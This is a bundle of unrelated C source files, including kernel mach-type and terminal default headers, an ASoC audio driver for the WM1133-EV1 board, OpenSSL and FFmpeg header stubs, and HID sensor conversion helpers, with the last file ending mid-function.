 * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU
 * General Public License for more details.
 *
 * You should have received a copy of the GNU General Public License
 * along with this program; if not, write to the Free Software
 * Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA  02111-1307
 * USA
 */

/* Make the header self-contained: it uses va_list, fprintf, malloc,
 * realloc, exit and size_t below. */
#include <stdarg.h>
#include <stdio.h>
#include <stdlib.h>

/*
 * Print a printf-style fatal error message (prefixed "FATAL ERROR: ")
 * to stderr and terminate the process with a non-zero exit status.
 * Never returns.
 */
static inline void __attribute__((noreturn)) die(const char *str, ...)
{
	va_list ap;

	va_start(ap, str);
	fprintf(stderr, "FATAL ERROR: ");
	vfprintf(stderr, str, ap);
	/* Each va_start must be paired with va_end (C99 7.15.1.3);
	 * the original leaked the va_list before exit(). */
	va_end(ap);
	exit(1);
}

/*
 * malloc() wrapper that dies on allocation failure, so callers never
 * need to check for NULL.  Returns a block of at least 'len' bytes.
 */
static inline void *xmalloc(size_t len)
{
	void *new = malloc(len);

	if (!new)
		die("malloc() failed\n");

	return new;
}

/*
 * realloc() wrapper that dies on allocation failure.  On success the
 * old pointer 'p' must no longer be used; ownership moves to the
 * returned block.
 */
static inline void *xrealloc(void *p, size_t len)
{
	void *new = realloc(p, len);

	if (!new)
		/* %zu is the correct conversion for size_t; the original
		 * used %d, which is undefined behavior where
		 * sizeof(size_t) != sizeof(int) (e.g. LP64). */
		die("realloc() failed (len=%zu)\n", len);

	return new;
}

/* Defined elsewhere; presumably both return newly allocated memory the
 * caller must free — TODO confirm against their definitions. */
extern char *xstrdup(const char *s);
extern char *join_path(const char *path, const char *name);

#endif /* _UTIL_H */
{ "language": "C" }
/*
 * This was automagically generated from arch/nds/tools/mach-types!
 * Do NOT edit
 */

#ifndef __ASM_NDS32_MACH_TYPE_H
#define __ASM_NDS32_MACH_TYPE_H

#ifndef __ASSEMBLY__
/* The type of machine we're running on */
extern unsigned int __machine_arch_type;
#endif

/* see arch/arm/kernel/arch.c for a description of these */
/* Numeric machine-type IDs for the supported boards. */
#define MACH_TYPE_ADPAG101P            1
#define MACH_TYPE_ADPAE3XX             2

/*
 * machine_arch_type resolves either to the runtime variable
 * __machine_arch_type (multi-board kernels: machine_arch_type was
 * already defined by an earlier board block, so the type must be
 * decided at runtime) or to this board's constant (single-board
 * kernels, letting the compiler fold machine_is_*() to a constant).
 */
#ifdef CONFIG_ARCH_ADPAG101P
# ifdef machine_arch_type
#  undef machine_arch_type
#  define machine_arch_type	__machine_arch_type
# else
#  define machine_arch_type	MACH_TYPE_ADPAG101P
# endif
/* True iff we are running on an ADPAG101P board. */
# define machine_is_adpag101p()	(machine_arch_type == MACH_TYPE_ADPAG101P)
#else
/* Board support not configured in: the predicate is trivially 1.
 * NOTE(review): (1) rather than (0) looks intentional but surprising —
 * matches the generated mach-types style; confirm against the
 * generator before relying on it. */
# define machine_is_adpag101p()	(1)
#endif

#endif /* __ASM_NDS32_MACH_TYPE_H */
{ "language": "C" }
/* * Copyright (c) 2000-2002 Apple Computer, Inc. All rights reserved. * * @APPLE_OSREFERENCE_LICENSE_HEADER_START@ * * This file contains Original Code and/or Modifications of Original Code * as defined in and that are subject to the Apple Public Source License * Version 2.0 (the 'License'). You may not use this file except in * compliance with the License. The rights granted to you under the License * may not be used to create, or enable the creation or redistribution of, * unlawful or unlicensed copies of an Apple operating system, or to * circumvent, violate, or enable the circumvention or violation of, any * terms of an Apple operating system software license agreement. * * Please obtain a copy of the License at * http://www.opensource.apple.com/apsl/ and read it before using this file. * * The Original Code and all software distributed under the License are * distributed on an 'AS IS' basis, WITHOUT WARRANTY OF ANY KIND, EITHER * EXPRESS OR IMPLIED, AND APPLE HEREBY DISCLAIMS ALL SUCH WARRANTIES, * INCLUDING WITHOUT LIMITATION, ANY WARRANTIES OF MERCHANTABILITY, * FITNESS FOR A PARTICULAR PURPOSE, QUIET ENJOYMENT OR NON-INFRINGEMENT. * Please see the License for the specific language governing rights and * limitations under the License. * * @APPLE_OSREFERENCE_LICENSE_HEADER_END@ */ /* Copyright (c) 1997 Apple Computer, Inc. All Rights Reserved */ /*- * Copyright (c) 1982, 1986, 1993 * The Regents of the University of California. All rights reserved. * (c) UNIX System Laboratories, Inc. * All or some portions of this file are derived from material licensed * to the University of California by American Telephone and Telegraph * Co. or Unix System Laboratories, Inc. and are reproduced herein with * the permission of UNIX System Laboratories, Inc. * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that the following conditions * are met: * 1. 
Redistributions of source code must retain the above copyright * notice, this list of conditions and the following disclaimer. * 2. Redistributions in binary form must reproduce the above copyright * notice, this list of conditions and the following disclaimer in the * documentation and/or other materials provided with the distribution. * 3. All advertising materials mentioning features or use of this software * must display the following acknowledgement: * This product includes software developed by the University of * California, Berkeley and its contributors. * 4. Neither the name of the University nor the names of its contributors * may be used to endorse or promote products derived from this software * without specific prior written permission. * * THIS SOFTWARE IS PROVIDED BY THE REGENTS AND CONTRIBUTORS ``AS IS'' AND * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE * ARE DISCLAIMED. IN NO EVENT SHALL THE REGENTS OR CONTRIBUTORS BE LIABLE * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF * SUCH DAMAGE. * * @(#)ttydefaults.h 8.4 (Berkeley) 1/21/94 */ /* * System wide defaults for terminal state. */ #ifndef _SYS_TTYDEFAULTS_H_ #define _SYS_TTYDEFAULTS_H_ /* * Defaults on "first" open. 
*/
/* Default termios flag words applied on "first" open of a tty. */
#define	TTYDEF_IFLAG	(BRKINT	| ICRNL	| IMAXBEL | IXON | IXANY)
#define TTYDEF_OFLAG	(OPOST | ONLCR)
#define TTYDEF_LFLAG	(ECHO | ICANON | ISIG | IEXTEN | ECHOE|ECHOKE|ECHOCTL)
#define TTYDEF_CFLAG	(CREAD | CS8 | HUPCL)
#define TTYDEF_SPEED	(B9600)

/*
 * Control Character Defaults
 */
/* Map an ASCII letter to its control-key code (clears bits 5 and 6). */
#define CTRL(x)	(x&037)
#define	CEOF		CTRL('d')
#define	CEOL		0xff		/* XXX avoid _POSIX_VDISABLE */
#define	CERASE		0177		/* DEL */
#define	CINTR		CTRL('c')
#define	CSTATUS		CTRL('t')
#define	CKILL		CTRL('u')
#define	CMIN		1
#define	CQUIT		034		/* FS, ^\ */
#define	CSUSP		CTRL('z')
#define	CTIME		0
#define	CDSUSP		CTRL('y')
#define	CSTART		CTRL('q')
#define	CSTOP		CTRL('s')
#define	CLNEXT		CTRL('v')
#define	CDISCARD 	CTRL('o')
#define	CWERASE 	CTRL('w')
#define	CREPRINT 	CTRL('r')
#define	CEOT		CEOF
/* compat */
/* Historical aliases kept for source compatibility. */
#define	CBRK		CEOL
#define	CRPRNT		CREPRINT
#define	CFLUSH		CDISCARD

/* PROTECTED INCLUSION ENDS HERE */
#endif /* !_SYS_TTYDEFAULTS_H_ */

/*
 * #define TTYDEFCHARS to include an array of default control characters.
 */
/* Deliberately outside the include guard: a second inclusion with
 * TTYDEFCHARS defined emits the array even if the header was already
 * seen.  Entries are ordered by the platform's NCCS c_cc[] indices. */
#ifdef TTYDEFCHARS
static cc_t	ttydefchars[NCCS] = {
	CEOF,	CEOL,	CEOL,	CERASE, CWERASE, CKILL, CREPRINT,
	_POSIX_VDISABLE, CINTR,	CQUIT,	CSUSP,	CDSUSP,	CSTART,	CSTOP,	CLNEXT,
	CDISCARD, CMIN,	CTIME,  CSTATUS, _POSIX_VDISABLE
};
#undef TTYDEFCHARS
#endif
{ "language": "C" }
/*
 * wm1133-ev1.c - Audio for WM1133-EV1 on i.MX31ADS
 *
 * Copyright (c) 2010 Wolfson Microelectronics plc
 * Author: Mark Brown <broonie@opensource.wolfsonmicro.com>
 *
 * Based on an earlier driver for the same hardware by Liam Girdwood.
 *
 * This program is free software; you can redistribute it and/or modify it
 * under the terms of the GNU General Public License as published by the
 * Free Software Foundation; either version 2 of the License, or (at your
 * option) any later version.
 */

#include <linux/platform_device.h>
#include <linux/clk.h>

#include <sound/core.h>
#include <sound/jack.h>
#include <sound/pcm.h>
#include <sound/pcm_params.h>
#include <sound/soc.h>
#include <sound/soc-dapm.h>

#include <mach/audmux.h>

#include "imx-ssi.h"
#include "../codecs/wm8350.h"

/* There is a silicon mic on the board optionally connected via a solder pad
 * SP1. Define this to enable it. */
#undef USE_SIMIC

/* One supported clocking configuration for the WM8350 codec DAI. */
struct _wm8350_audio {
	unsigned int channels;		/* channel count this entry serves */
	snd_pcm_format_t format;	/* PCM sample format */
	unsigned int rate;		/* sample rate in Hz */
	unsigned int sysclk;		/* codec SYSCLK (FLL output) in Hz */
	unsigned int bclkdiv;		/* BCLK divider from SYSCLK */
	unsigned int clkdiv;		/* DAC/ADC clock divider */
	unsigned int lr_rate;		/* LRCLK divider (BCLKs per phase) */
};

/* in order of power consumption per rate (lowest first) */
static const struct _wm8350_audio wm8350_audio[] = {
	/* 16bit mono modes */
	{1, SNDRV_PCM_FORMAT_S16_LE, 8000,
	 12288000 >> 1, WM8350_BCLK_DIV_48, WM8350_DACDIV_3, 16,},

	/* 16 bit stereo modes */
	{2, SNDRV_PCM_FORMAT_S16_LE, 8000,
	 12288000, WM8350_BCLK_DIV_48, WM8350_DACDIV_6, 32,},
	{2, SNDRV_PCM_FORMAT_S16_LE, 16000,
	 12288000, WM8350_BCLK_DIV_24, WM8350_DACDIV_3, 32,},
	{2, SNDRV_PCM_FORMAT_S16_LE, 32000,
	 12288000, WM8350_BCLK_DIV_12, WM8350_DACDIV_1_5, 32,},
	{2, SNDRV_PCM_FORMAT_S16_LE, 48000,
	 12288000, WM8350_BCLK_DIV_8, WM8350_DACDIV_1, 32,},
	{2, SNDRV_PCM_FORMAT_S16_LE, 96000,
	 24576000, WM8350_BCLK_DIV_8, WM8350_DACDIV_1, 32,},
	{2, SNDRV_PCM_FORMAT_S16_LE, 11025,
	 11289600, WM8350_BCLK_DIV_32, WM8350_DACDIV_4, 32,},
	{2, SNDRV_PCM_FORMAT_S16_LE, 22050,
	 11289600, WM8350_BCLK_DIV_16, WM8350_DACDIV_2, 32,},
	{2, SNDRV_PCM_FORMAT_S16_LE, 44100,
	 11289600, WM8350_BCLK_DIV_8, WM8350_DACDIV_1, 32,},
	{2, SNDRV_PCM_FORMAT_S16_LE, 88200,
	 22579200, WM8350_BCLK_DIV_8, WM8350_DACDIV_1, 32,},

	/* 24bit stereo modes */
	{2, SNDRV_PCM_FORMAT_S24_LE, 48000,
	 12288000, WM8350_BCLK_DIV_4, WM8350_DACDIV_1, 64,},
	{2, SNDRV_PCM_FORMAT_S24_LE, 96000,
	 24576000, WM8350_BCLK_DIV_4, WM8350_DACDIV_1, 64,},
	{2, SNDRV_PCM_FORMAT_S24_LE, 44100,
	 11289600, WM8350_BCLK_DIV_4, WM8350_DACDIV_1, 64,},
	{2, SNDRV_PCM_FORMAT_S24_LE, 88200,
	 22579200, WM8350_BCLK_DIV_4, WM8350_DACDIV_1, 64,},
};

/*
 * hw_params callback: look up a matching entry in wm8350_audio[] for the
 * requested rate/format/channel count and program the codec FLL, both DAI
 * formats, the SSI TDM slots and all codec clock dividers accordingly.
 * Returns 0 on success or -EINVAL if the configuration is unsupported.
 *
 * NOTE(review): the snd_soc_dai_set_* return values are ignored
 * throughout; presumably acceptable on this fixed board — confirm.
 */
static int wm1133_ev1_hw_params(struct snd_pcm_substream *substream,
				struct snd_pcm_hw_params *params)
{
	struct snd_soc_pcm_runtime *rtd = substream->private_data;
	struct snd_soc_dai *codec_dai = rtd->dai->codec_dai;
	struct snd_soc_dai *cpu_dai = rtd->dai->cpu_dai;
	int i, found = 0;
	snd_pcm_format_t format = params_format(params);
	unsigned int rate = params_rate(params);
	unsigned int channels = params_channels(params);
	u32 dai_format;

	/* find the correct audio parameters */
	for (i = 0; i < ARRAY_SIZE(wm8350_audio); i++) {
		if (rate == wm8350_audio[i].rate &&
		    format == wm8350_audio[i].format &&
		    channels == wm8350_audio[i].channels) {
			found = 1;
			break;
		}
	}
	if (!found)
		return -EINVAL;

	/* codec FLL input is 14.75 MHz from MCLK */
	snd_soc_dai_set_pll(codec_dai, 0, 0, 14750000, wm8350_audio[i].sysclk);

	/* I2S, normal clock polarity, codec is bit/frame clock master */
	dai_format = SND_SOC_DAIFMT_I2S | SND_SOC_DAIFMT_NB_NF |
		SND_SOC_DAIFMT_CBM_CFM;

	/* set codec DAI configuration */
	snd_soc_dai_set_fmt(codec_dai, dai_format);

	/* set cpu DAI configuration */
	snd_soc_dai_set_fmt(cpu_dai, dai_format);

	/* TODO: The SSI driver should figure this out for us */
	switch (channels) {
	case 2:
		snd_soc_dai_set_tdm_slot(cpu_dai, 0xffffffc, 0xffffffc, 2, 0);
		break;
	case 1:
		snd_soc_dai_set_tdm_slot(cpu_dai, 0xffffffe, 0xffffffe, 1, 0);
		break;
	default:
		return -EINVAL;
	}

	/* set MCLK as the codec system clock for DAC and ADC */
	snd_soc_dai_set_sysclk(codec_dai, WM8350_MCLK_SEL_PLL_MCLK,
			       wm8350_audio[i].sysclk, SND_SOC_CLOCK_IN);

	/* set codec BCLK division for sample rate */
	snd_soc_dai_set_clkdiv(codec_dai, WM8350_BCLK_CLKDIV,
			       wm8350_audio[i].bclkdiv);

	/* DAI is synchronous and clocked with DAC LRCLK & ADC LRC */
	snd_soc_dai_set_clkdiv(codec_dai,
			       WM8350_DACLR_CLKDIV, wm8350_audio[i].lr_rate);
	snd_soc_dai_set_clkdiv(codec_dai,
			       WM8350_ADCLR_CLKDIV, wm8350_audio[i].lr_rate);

	/* now configure DAC and ADC clocks */
	snd_soc_dai_set_clkdiv(codec_dai,
			       WM8350_DAC_CLKDIV, wm8350_audio[i].clkdiv);

	snd_soc_dai_set_clkdiv(codec_dai,
			       WM8350_ADC_CLKDIV, wm8350_audio[i].clkdiv);

	return 0;
}

static struct snd_soc_ops wm1133_ev1_ops = {
	.hw_params = wm1133_ev1_hw_params,
};

/* DAPM widgets for the board-level audio connectors. */
static const struct snd_soc_dapm_widget wm1133_ev1_widgets[] = {
#ifdef USE_SIMIC
	SND_SOC_DAPM_MIC("SiMIC", NULL),
#endif
	SND_SOC_DAPM_MIC("Mic1 Jack", NULL),
	SND_SOC_DAPM_MIC("Mic2 Jack", NULL),
	SND_SOC_DAPM_LINE("Line In Jack", NULL),
	SND_SOC_DAPM_LINE("Line Out Jack", NULL),
	SND_SOC_DAPM_HP("Headphone Jack", NULL),
};

/* imx32ads soc_card audio map */
static const struct snd_soc_dapm_route wm1133_ev1_map[] = {
#ifdef USE_SIMIC
	/* SiMIC --> IN1LN (with automatic bias) via SP1 */
	{ "IN1LN", NULL, "Mic Bias" },
	{ "Mic Bias", NULL, "SiMIC" },
#endif

	/* Mic 1 Jack --> IN1LN and IN1LP (with automatic bias) */
	{ "IN1LN", NULL, "Mic Bias" },
	{ "IN1LP", NULL, "Mic1 Jack" },
	{ "Mic Bias", NULL, "Mic1 Jack" },

	/* Mic 2 Jack --> IN1RN and IN1RP (with automatic bias) */
	{ "IN1RN", NULL, "Mic Bias" },
	{ "IN1RP", NULL, "Mic2 Jack" },
	{ "Mic Bias", NULL, "Mic2 Jack" },

	/* Line in Jack --> AUX (L+R) */
	{ "IN3R", NULL, "Line In Jack" },
	{ "IN3L", NULL, "Line In Jack" },

	/* Out1 --> Headphone Jack */
	{ "Headphone Jack", NULL, "OUT1R" },
	{ "Headphone Jack", NULL, "OUT1L" },

	/* Out1 --> Line Out Jack */
	{ "Line Out Jack", NULL, "OUT2R" },
	{ "Line Out Jack", NULL, "OUT2L" },
};

/* Jack objects and the DAPM pins they control. */
static struct snd_soc_jack hp_jack;

static struct snd_soc_jack_pin hp_jack_pins[] = {
	{ .pin = "Headphone Jack", .mask = SND_JACK_HEADPHONE },
};

static struct snd_soc_jack mic_jack;

static struct snd_soc_jack_pin mic_jack_pins[] = {
	{ .pin = "Mic1 Jack", .mask = SND_JACK_MICROPHONE },
	{ .pin = "Mic2 Jack", .mask = SND_JACK_MICROPHONE },
};

/*
 * Card init callback: register DAPM widgets/routes, set up headphone and
 * microphone jack detection via the WM8350, and keep Mic Bias enabled so
 * detection works while the card is idle.
 */
static int wm1133_ev1_init(struct snd_soc_codec *codec)
{
	struct snd_soc_card *card = codec->socdev->card;

	snd_soc_dapm_new_controls(codec, wm1133_ev1_widgets,
				  ARRAY_SIZE(wm1133_ev1_widgets));

	snd_soc_dapm_add_routes(codec, wm1133_ev1_map,
				ARRAY_SIZE(wm1133_ev1_map));

	/* Headphone jack detection */
	snd_soc_jack_new(card, "Headphone", SND_JACK_HEADPHONE, &hp_jack);
	snd_soc_jack_add_pins(&hp_jack, ARRAY_SIZE(hp_jack_pins),
			      hp_jack_pins);
	wm8350_hp_jack_detect(codec, WM8350_JDR, &hp_jack, SND_JACK_HEADPHONE);

	/* Microphone jack detection */
	snd_soc_jack_new(card, "Microphone",
			 SND_JACK_MICROPHONE | SND_JACK_BTN_0, &mic_jack);
	snd_soc_jack_add_pins(&mic_jack, ARRAY_SIZE(mic_jack_pins),
			      mic_jack_pins);
	wm8350_mic_jack_detect(codec, &mic_jack, SND_JACK_MICROPHONE,
			       SND_JACK_BTN_0);

	snd_soc_dapm_force_enable_pin(codec, "Mic Bias");

	return 0;
}

static struct snd_soc_dai_link wm1133_ev1_dai = {
	.name = "WM1133-EV1",
	.stream_name = "Audio",
	.cpu_dai = &imx_ssi_pcm_dai[0],
	.codec_dai = &wm8350_dai,
	.init = wm1133_ev1_init,
	.ops = &wm1133_ev1_ops,
	.symmetric_rates = 1,
};

static struct snd_soc_card wm1133_ev1 = {
	.name = "WM1133-EV1",
	.platform = &imx_soc_platform,
	.dai_link = &wm1133_ev1_dai,
	.num_links = 1,
};

static struct snd_soc_device wm1133_ev1_snd_devdata = {
	.card = &wm1133_ev1,
	.codec_dev = &soc_codec_dev_wm8350,
};

static struct platform_device *wm1133_ev1_snd_device;

/*
 * Module init: route the i.MX31 AUDMUX so SSI0 is mastered by external
 * port 5, then register the "soc-audio" platform device that binds the
 * card.  On platform_device_add() failure the device is released.
 */
static int __init wm1133_ev1_audio_init(void)
{
	int ret;
	unsigned int ptcr, pdcr;

	/* SSI0 mastered by port 5 */
	ptcr = MXC_AUDMUX_V2_PTCR_SYN |
		MXC_AUDMUX_V2_PTCR_TFSDIR |
		MXC_AUDMUX_V2_PTCR_TFSEL(MX31_AUDMUX_PORT5_SSI_PINS_5) |
		MXC_AUDMUX_V2_PTCR_TCLKDIR |
		MXC_AUDMUX_V2_PTCR_TCSEL(MX31_AUDMUX_PORT5_SSI_PINS_5);
	pdcr = MXC_AUDMUX_V2_PDCR_RXDSEL(MX31_AUDMUX_PORT5_SSI_PINS_5);
	mxc_audmux_v2_configure_port(MX31_AUDMUX_PORT1_SSI0, ptcr, pdcr);

	ptcr = MXC_AUDMUX_V2_PTCR_SYN;
	pdcr = MXC_AUDMUX_V2_PDCR_RXDSEL(MX31_AUDMUX_PORT1_SSI0);
	mxc_audmux_v2_configure_port(MX31_AUDMUX_PORT5_SSI_PINS_5, ptcr, pdcr);

	wm1133_ev1_snd_device = platform_device_alloc("soc-audio", -1);
	if (!wm1133_ev1_snd_device)
		return -ENOMEM;

	platform_set_drvdata(wm1133_ev1_snd_device, &wm1133_ev1_snd_devdata);
	wm1133_ev1_snd_devdata.dev = &wm1133_ev1_snd_device->dev;
	ret = platform_device_add(wm1133_ev1_snd_device);

	if (ret)
		platform_device_put(wm1133_ev1_snd_device);

	return ret;
}
module_init(wm1133_ev1_audio_init);

static void __exit wm1133_ev1_audio_exit(void)
{
	platform_device_unregister(wm1133_ev1_snd_device);
}
module_exit(wm1133_ev1_audio_exit);

MODULE_AUTHOR("Mark Brown <broonie@opensource.wolfsonmicro.com>");
MODULE_DESCRIPTION("Audio for WM1133-EV1 on i.MX31ADS");
MODULE_LICENSE("GPL");
{ "language": "C" }
/* ==================================================================== * Copyright (c) 1999 The OpenSSL Project. All rights reserved. * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that the following conditions * are met: * * 1. Redistributions of source code must retain the above copyright * notice, this list of conditions and the following disclaimer. * * 2. Redistributions in binary form must reproduce the above copyright * notice, this list of conditions and the following disclaimer in * the documentation and/or other materials provided with the * distribution. * * 3. All advertising materials mentioning features or use of this * software must display the following acknowledgment: * "This product includes software developed by the OpenSSL Project * for use in the OpenSSL Toolkit. (http://www.OpenSSL.org/)" * * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to * endorse or promote products derived from this software without * prior written permission. For written permission, please contact * licensing@OpenSSL.org. * * 5. Products derived from this software may not be called "OpenSSL" * nor may "OpenSSL" appear in their names without prior written * permission of the OpenSSL Project. * * 6. Redistributions of any form whatsoever must retain the following * acknowledgment: * "This product includes software developed by the OpenSSL Project * for use in the OpenSSL Toolkit (http://www.OpenSSL.org/)" * * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR * PURPOSE ARE DISCLAIMED. 
/*
 * IN NO EVENT SHALL THE OpenSSL PROJECT OR
 * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
 * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
 * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
 * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
 * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
 * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
 * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
 * OF THE POSSIBILITY OF SUCH DAMAGE.
 * ====================================================================
 *
 * This product includes cryptographic software written by Eric Young
 * (eay@cryptsoft.com).  This product includes software written by Tim
 * Hudson (tjh@cryptsoft.com).
 *
 */

/*
 * This header only exists to break a circular dependency between pem and err
 * Ben 30 Jan 1999.
 */

#ifdef __cplusplus
extern "C" {
#endif

/* Declare the PEM error-string loader only when pem.h (which declares
 * it itself under the HEADER_PEM_H guard) has not been included. */
#ifndef HEADER_PEM_H
void ERR_load_PEM_strings(void);
#endif

#ifdef __cplusplus
}
#endif
{ "language": "C" }
/*
 * Blackmagic DeckLink common code
 * Copyright (c) 2013-2014 Ramiro Polla
 *
 * This file is part of FFmpeg.
 *
 * FFmpeg is free software; you can redistribute it and/or
 * modify it under the terms of the GNU Lesser General Public
 * License as published by the Free Software Foundation; either
 * version 2.1 of the License, or (at your option) any later version.
 *
 * FFmpeg is distributed in the hope that it will be useful,
 * but WITHOUT ANY WARRANTY; without even the implied warranty of
 * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU
 * Lesser General Public License for more details.
 *
 * You should have received a copy of the GNU Lesser General Public
 * License along with FFmpeg; if not, write to the Free Software
 * Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
 */

/*
 * Option/context bridge for the DeckLink device code.
 *
 * NOTE(review): field semantics below are inferred from the names and
 * the "Options" grouping; confirm against the AVOption table that
 * populates this struct.
 */
struct decklink_cctx {
    const AVClass *cclass;  /* AVClass used for option parsing/logging */
    void *ctx;              /* opaque implementation context — presumably
                             * owned by the C++ DeckLink side; confirm */

    /* Options */
    int list_devices;       /* presumably: list available devices */
    int list_formats;       /* presumably: list supported formats */
    double preroll;         /* preroll amount (units not shown here) */
    int v210;               /* presumably: enable 10-bit v210 video */
};
{ "language": "C" }
/*
 * HID Sensors Driver
 * Copyright (c) 2012, Intel Corporation.
 *
 * This program is free software; you can redistribute it and/or modify it
 * under the terms and conditions of the GNU General Public License,
 * version 2, as published by the Free Software Foundation.
 *
 * This program is distributed in the hope it will be useful, but WITHOUT
 * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or
 * FITNESS FOR A PARTICULAR PURPOSE.  See the GNU General Public License for
 * more details.
 *
 * You should have received a copy of the GNU General Public License along with
 * this program; if not, write to the Free Software Foundation, Inc.,
 * 51 Franklin St - Fifth Floor, Boston, MA 02110-1301 USA.
 *
 */
#include <linux/device.h>
#include <linux/platform_device.h>
#include <linux/module.h>
#include <linux/interrupt.h>
#include <linux/irq.h>
#include <linux/slab.h>
#include <linux/hid-sensor-hub.h>
#include <linux/iio/iio.h>
#include <linux/iio/sysfs.h>

/* Integer 10^power; callers only pass small exponents (at most 9). */
static int pow_10(unsigned power)
{
	int i;
	int ret = 1;

	for (i = 0; i < power; ++i)
		ret = ret * 10;

	return ret;
}

/*
 * Split dividend/divisor into a whole part (*whole) and a six-decimal
 * micro fraction (*micro_frac), as used by IIO_VAL_INT_PLUS_MICRO.
 * A zero divisor yields 0/0 instead of dividing by zero.
 */
static void simple_div(int dividend, int divisor, int *whole,
		       int *micro_frac)
{
	int rem;
	int exp = 0;

	*micro_frac = 0;
	if (divisor == 0) {
		*whole = 0;
		return;
	}
	*whole = dividend / divisor;
	rem = dividend % divisor;
	if (rem) {
		/* Scale the remainder up to the divisor so the leading
		 * fractional digits survive the integer division below. */
		while (rem <= divisor) {
			rem *= 10;
			exp++;
		}
		*micro_frac = (rem / divisor) * pow_10(6 - exp);
	}
}

/*
 * Split "no", a fixed-point value with 'exp' fractional decimal digits,
 * into an integer part (*val1) and a micro part (*val2).
 */
static void split_micro_fraction(unsigned int no, int exp, int *val1,
				 int *val2)
{
	*val1 = no / pow_10(exp);
	*val2 = no % pow_10(exp) * pow_10(6 - exp);
}

/*
 * VTF format uses exponent and variable size format. For example if the
 * size is 2 bytes, 0x0067 with VTF16E14 format -> +1.03: convert 0x67 to
 * decimal and use two decimal places, as E14 stands for 10^-2.
 * Negative numbers are 2's complement.
 */
static void convert_from_vtf_format(u32 value, int size, int exp,
				    int *val1, int *val2)
{
	int sign = 1;

	/* Top bit of the 'size'-byte field set -> negative (2's complement) */
	if (value & BIT(size * 8 - 1)) {
		value = ((1LL << (size * 8)) - value);
		sign = -1;
	}
	exp = hid_sensor_convert_exponent(exp);
	if (exp >= 0) {
		*val1 = sign * value * pow_10(exp);
		*val2 = 0;
	} else {
		split_micro_fraction(value, -exp, val1, val2);
		/* Carry the sign on whichever component is non-zero. */
		if (*val1)
			*val1 = sign * (*val1);
		else
			*val2 = sign * (*val2);
	}
}

/*
 * Inverse of convert_from_vtf_format(): pack val1.val2 (micro fraction)
 * into a 'size'-byte VTF field with decimal exponent 'exp'.
 */
static u32 convert_to_vtf_format(int size, int exp, int val1, int val2)
{
	u32 value;
	int sign = 1;

	if (val1 < 0 || val2 < 0)
		sign = -1;
	exp = hid_sensor_convert_exponent(exp);
	if (exp < 0) {
		value = abs(val1) * pow_10(-exp);
		value += abs(val2) / pow_10(6 + exp);
	} else
		value = abs(val1) / pow_10(exp);
	if (sign < 0)
		value = ((1LL << (size * 8)) - value);

	return value;
}

/*
 * Read the polling interval feature report and report it as a sampling
 * frequency (1/interval) in *val1 (Hz) and *val2 (micro-Hz).
 * Returns IIO_VAL_INT_PLUS_MICRO on success, -EINVAL on failure or
 * unsupported units.
 */
int hid_sensor_read_samp_freq_value(struct hid_sensor_common *st,
				    int *val1, int *val2)
{
	s32 value;
	int ret;

	ret = sensor_hub_get_feature(st->hsdev,
				     st->poll.report_id,
				     st->poll.index, &value);
	if (ret < 0 || value < 0) {
		*val1 = *val2 = 0;
		return -EINVAL;
	} else {
		if (st->poll.units == HID_USAGE_SENSOR_UNITS_MILLISECOND)
			simple_div(1000, value, val1, val2);
		else if (st->poll.units == HID_USAGE_SENSOR_UNITS_SECOND)
			simple_div(1, value, val1, val2);
		else {
			*val1 = *val2 = 0;
			return -EINVAL;
		}
	}

	return IIO_VAL_INT_PLUS_MICRO;
}
EXPORT_SYMBOL(hid_sensor_read_samp_freq_value);

/*
 * Write a sampling frequency given as val1 (Hz) + val2 (micro-Hz):
 * convert to a polling interval in the units the device reports and set
 * the feature report.  Returns 0 on success, negative error otherwise.
 */
int hid_sensor_write_samp_freq_value(struct hid_sensor_common *st,
				     int val1, int val2)
{
	s32 value;
	int ret;

	/*
	 * Bug fix: the original assigned "ret = -EINVAL" here but then
	 * unconditionally overwrote ret with the sensor_hub_set_feature()
	 * result, so negative inputs were never rejected.  Return early
	 * instead.
	 */
	if (val1 < 0 || val2 < 0)
		return -EINVAL;

	/* Frequency in micro-Hz; 0 means "leave interval at 0". */
	value = val1 * pow_10(6) + val2;
	if (value) {
		if (st->poll.units == HID_USAGE_SENSOR_UNITS_MILLISECOND)
			value = pow_10(9) / value;
		else if (st->poll.units == HID_USAGE_SENSOR_UNITS_SECOND)
			value = pow_10(6) / value;
		else
			value = 0;
	}
	ret = sensor_hub_set_feature(st->hsdev,
				     st->poll.report_id,
				     st->poll.index, value);
	if (ret < 0 || value < 0)
		ret = -EINVAL;

